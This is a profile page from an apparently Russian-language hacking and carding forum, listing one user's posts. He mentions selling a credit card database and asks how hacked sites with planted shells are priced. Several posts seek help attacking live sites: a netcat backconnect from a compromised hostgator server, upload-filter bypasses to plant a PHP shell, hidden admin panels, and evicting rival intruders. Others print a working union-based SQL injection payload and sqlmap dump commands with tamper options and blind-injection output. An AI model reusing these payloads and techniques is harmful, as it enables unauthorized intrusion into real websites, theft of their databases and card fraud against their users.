Перейти к содержанию

linktop

Пользователь
  • Публикаций

    16
  • Зарегистрирован

  • Посещение

Репутация

51 Excellent

Информация о linktop

  • Звание
    Rank №2
  1. Есть возможность заливки шелла?
  2. Продал базу сс. С человеком списался, договорились по цене. Сделка прошла быстро и без заморочек. Советую.
  3. Initiative Q

    Инвайт https://initiativeq.com/invite/SftZjNfum
  4. Нужен совет

    Согласен с выше написанным постом. Если Windows, то Truecrypt. Если Linux то на этапе установки шифруешь. Главное придумать сложный пароль и не забыть его.))))
  5. Снести 10 и поставить Win7. Либо использовать как простой выход в нэт, тогда и обновления не надо убирать.
  6. Вот сайт, неплохо работают, а самое главное при разрыве соединения - блокируется трафик. Топик их был на форуме этом.
  7. PSI+

    Попробуй удалить с помощью Reg Organizer (прога находит следы проги и удаляет их).
  8. Здравствуйте. При загузки шелла на сайт и полного над ним контроля, т.е. root... Как оцениваются сайты при продажи. - .ru - .com - шопы сколько стоят нулевки? А так же как оценить сайты если там не root права?
  9. Да, действительно, за натом сижу. Прочитал статью, мой ип попадает под это. Спасибо за ответ. Буду искать как пробросить порт.
  10. Залил шелл на сайт. $ uname -a Linux gator4050.hostgator.com 3.10.0-693.11.6.1.ELK.el6.x86_64 #1 SMP Tue Jan 23 10:30:30 MST 2018 x86_64 x86_64 x86_64 GNU/Linux Не могу сделать Backconnectе. Пересмотрел видео на ютубе, статьи читал. Делал все как там написано и показано, но ни чего не получилось. Сижу под ssh. Что я делал: 1. Скачал NetCat. Разархивировал на диске С. Потом в cmd прописал C://nc/nc -lvp 3137 Далее пишется: listening on [any] 3137 . . . На сайте захожу в Network прописываю IP(ssh) и порт(3137) И ничего не происходит... Нашел видео где показано, что может и не подключаться так. Значит перешел ко второму способу. 2. Скачал NGROKна комп, на сайт загрузил cgi webshell. Пробывал через него. Но также ничего не проходит. Скажите, что я делаю не так? Направьте на правильный путь.
  11. Подскажите пожалуйста. 1. Перехожу на стриницу админки. Вношу пороль и логин - открывается страница "СЕРВЕР НЕ НАЙДЕН". Что это может быть и как можно зайти на админку. Если прописываю неправильные пороли и логины - пишет что пароль неправильный. (может заход с определенного ИП адресса? Если да, то как можно его узнать?) 2. Не могу залить в админке шелл. Загружается только расширения картинок. Пробовал через Tamper Data, brute suite. В brute suite менял jpg на php, php4, html, sphtm и т.д. ни чего не помогло. Если расширение php.jpg то загружается и открывается как картинка, если jpj.php - уже не грузиться (выдает ошибку). Если какие то другие способы заливки. 3. Куда обычно прячут админки на modx кроме /manager/?
  12. Есть доступ к шеллу. На сайте есть присутствие других взломщиков. Подскажите как очистить сайт от присутствия других. Пробовал с помощью ай болита почистить. Пытался залить через шелл файлы, но не могу ни как залить файл AIBOLIT-WHITELIST.db (ни ошибки не выдаёт, ни чего, просто страница перезагружается, но файл не появляется в списке). В адресной строке прописываю site.com/ai-bolit.php?p=RFDEsa --- пишет - у вас простой пароль, создайте сложнее. Менял, но так не могу дойти до запуска. Подскажите как выйти из этой ситуации? Может есть другие способы проверить и очистить?
  13. В браузере получаю таблицы так - http: //site. com/index.php?id=1'/*!12345union*/ select 1,table_name,3 from information_schema.tables wehere table_schema=database()-- - Выходит список таблиц... В sqlmap записываю так - sqlmap.py -u http: //site. com/index.php?id=1 --cookie="PHPSESSID=8524622....." --dbs Выходит ошибка. https://dropmefiles.com/JaToz Вставлял --random-agent --risk=3 - не проходит Подскажите, можно ли что то сделать в sqlmap?
  14. Нужна помощь. Нашел на сайте сукулю, раскрутил её в ручную. Нашел некоторую инфу, скорее часть её. Попытался слить базу через sqlmap, но ничего не получилось. Решил проверить на уязвимость в Acunetix и в Netsparker, но там тоже не прошло, ни какой ошибки не выдало. При открытии сайта выходит окно, где надо подтвердить что есть 18 лет. Только после нажатия на кнопку можно дальше смотреть сайт. Теперь вопрос. Как можно сделать проверку или прогнать через sqlmap если на сайте выходит это окно, как можно его обойти? Из-за этого окна не проходит проверка.
  15. Sqlmap выдает - ?

    Parameter: event (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: event=SPECIAL" AND 7933=7933 AND "jRjv"="jRjv Таблицы и колоноки выводятся медленно. Когда делаю дамп... sqlmap.py -u site --random-agent --level=5 --risk=3 --tamper=between,randomcase,space2comment -D ... -T ... -C ... --dump --no-cast -o выходит такое. [01:08:59] [iNFO] retrieving the length of query output [01:09:00] [iNFO] retrieved: [01:09:00] [iNFO] resumed: ????????????????????? [01:09:00] [iNFO] retrieving the length of query output [01:09:01] [iNFO] retrieved: [01:09:01] [iNFO] resumed: ????????????????????? Можно это как то обойти? Пробовал дамп любой колонки выводить, но эффект тот же.
×